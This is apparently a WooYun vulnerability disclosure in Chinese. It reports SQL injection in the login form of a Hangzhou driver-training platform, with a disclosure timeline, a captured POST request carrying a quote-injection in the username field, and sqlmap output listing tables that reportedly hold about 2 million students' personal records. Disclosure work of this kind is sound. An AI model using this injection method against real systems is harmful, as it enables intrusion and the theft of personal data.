乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-23: 细节已通知厂商并且等待厂商处理中 2016-01-27: 厂商已经确认,细节仅向厂商公开 2016-02-06: 细节向核心白帽子及相关领域专家公开 2016-02-16: 细节向普通白帽子公开 2016-02-26: 细节向实习白帽子公开 2016-03-10: 细节向公众公开
http://**.**.**.**/login.html 杭州机动车驾驶服务平台,POST登录处存在注入,通过注入,发现大量数据。200W学员个人详细信息,包括姓名身份证,以及一些其他信息.信息量过大,sqlmap跑的太慢了,只截图部分证明危害。
POST /login HTTP/1.1Host: **.**.**.**Content-Length: 71Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://**.**.**.**User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencodedReferer: http://**.**.**.**/login.htmlAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=6A76572B948B20F30C4BC4A0F55C5982; Hm_lvt_300bc40d67dafdf05c30652d6b4f1dfc=1453510620; Hm_lpvt_300bc40d67dafdf05c30652d6b4f1dfc=1453511212type=student&sty=student&username=aaaa%27&password=aaaa&verifycode=ikii
POST包
Database: DFO+-----------------------+---------+| Table | Entries |+-----------------------+---------+| PRO_STUDENTTRAININFO | 15087742 || GEN_PRO_STUDENTAPPLY | 3856704 || STU_TRAININFO_14_06 | 2962364 || STU_TRAININFO_14_05 | 2778205 || GEN_STUDENTEXAMINFO | 2722961 || STU_TRAININFO_14_07 | 2393334 || STU_TRAININFO_14_08 | 1544142 || GEN_STUDENTINFO | 1416002 || GEN_STUDENTEXTINFO | 1414759 || STU_TRAININFO_14_09 | 1354943 || STU_TRAININFO_14_10 | 1160171 || STU_TRAININFO_14_11 | 1158827 || STU_TRAININFO_14_04 | 866499 || STU_TRAININFO_14_12 | 531389 || STU_TRAININFO_13_12 | 134188 || STU_TRAININFO_14_03 | 114063 || STU_TRAININFO_14_01 | 78584 || STU_TRAININFO_14_02 | 65702 || STU_TRAININFO_15_01 | 25234 || STU_TRAININFO_15_03 | 18191 || STU_TRAININFO_15_02 | 14657 || STU_TRAININFO_15_04 | 10288 || GEN_COACHEXTINFO | 10276 || GEN_COACHINFO | 10253 || STU_TRAININFO_13_10 | 5555 || STU_TRAININFO_13_11 | 4934 || STU_TRAININFO_15_05 | 2756 || STU_TRAININFO_15_09 | 421 || EACODE | 261 || STU_TRAININFO_15_07 | 261 || STU_TRAININFO_15_08 | 210 || STU_TRAININFO_16_01 | 143 || GEN_DRIVESCHOOLEXT | 140 || GEN_DRIVESCHOOL | 138 || STU_TRAININFO_15_06 | 34 || TEACH_EXAMPERIOD | 32 || PBCATEDT | 21 || PBCATFMT | 20 || STU_TRAININFO_15_12 | 20 || TCH_DRIVECARTYPE | 16 || SYS_AREAINFO | 14 || TEACH_EXAMSUBJECTINFO | 2 |+-----------------------+---------+
数据库结构
危害等级:高
漏洞Rank:10
确认时间:2016-01-27 17:27
CNVD确认所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调网站管理单位处置.
暂无